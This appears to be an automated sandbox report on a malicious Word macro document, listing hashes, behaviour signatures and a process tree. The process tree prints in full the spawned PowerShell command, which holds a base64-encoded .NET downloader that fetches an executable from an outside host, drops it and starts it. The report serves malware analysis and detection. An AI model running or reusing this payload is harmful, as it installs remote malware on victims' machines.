Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    18-05-2024 01:59

General

  • Target

    52924bf155803608b04f807726d56d74_JaffaCakes118.docm

  • Size

    68KB

  • MD5

    52924bf155803608b04f807726d56d74

  • SHA1

    f2687578ccb884966553fb6f64446aceb1f08add

  • SHA256

    f8ef462e7b340fb3cb75ff527f6b994355e6eed794d4b2852f5544ccca4c5124

  • SHA512

    613e1a62b54026160a1d8de3cfe0be3d4098aeffa9c375fe50ea2ac2b0e1bb94849107f0b0a432253d272b975449a96114311e8ecb07e7c053c07f9929707de4

  • SSDEEP

    1536:dmwHPPcqWIbDyNhlXP+uXEAOcdaXobhbaF6sTNksgDB26:7PIoIhhP+uXSyboTksgDBB

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops startup file 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52924bf155803608b04f807726d56d74_JaffaCakes118.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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AACSBJ8AAgABAAMAAQACAAMAAgAGAAUAAgAHAAcAAQAIAAcAAgAJAAkABIAAAAEAAAAAAAAAAAAAAAAAEwAAAAIAAAAAAAAAAAAAAFcACgAAAAAAAgAAAAAAAAAAAAAAVwAFAwAAAAAAAAAAAQAAABkEAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAERvd25sb2FkAFN5bmNocm9uaXplZAA8RGVzdFBhdGg+a19fQmFja2luZ0ZpZWxkAGRlZmF1bHRJbnN0YW5jZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBEb3dubG9hZEZpbGUAVHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB2YWx1ZQBEb3dubG9hZC5leGUAU3RyaW5nAEdldEZvbGRlclBhdGgAZ2V0X0Rlc3RQYXRoAHNldF9EZXN0UGF0aABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAUHJvZ3JhbQBTeXN0ZW0A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');[Reflection.Assembly]::Load($code_).EntryPoint.Invoke($Null,$Null);
      2⤵
      • Process spawned unexpected child process
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1664

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4a7fb8d2bf93917c84b14e4c512211d9

      SHA1

      9cb10fc7a0b88cbd5a1c1357fbe34a3d7b2c94f1

      SHA256

      53b0d6b149a97b6de924d80659c07a2c5e74f4fceac77cba2298ceb5d5ace388

      SHA512

      4f3894e9f150bbe2c6240127501060b9854106d75d1d3c81812376d496601ca9556e7c4c76f74d85ed108c005a9613ca0c46162549cf51527e555aac4348cc78

    • memory/1256-90-0x00000000054D0000-0x0000000005528000-memory.dmp

      Filesize

      352KB

    • memory/2972-84-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-97-0x000000007170D000-0x0000000071718000-memory.dmp

      Filesize

      44KB

    • memory/2972-0-0x000000002F621000-0x000000002F622000-memory.dmp

      Filesize

      4KB

    • memory/2972-70-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-86-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-87-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-2-0x000000007170D000-0x0000000071718000-memory.dmp

      Filesize

      44KB

    • memory/2972-85-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-98-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-99-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-119-0x0000000005330000-0x0000000005430000-memory.dmp

      Filesize

      1024KB

    • memory/2972-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2972-132-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2972-133-0x000000007170D000-0x0000000071718000-memory.dmp

      Filesize

      44KB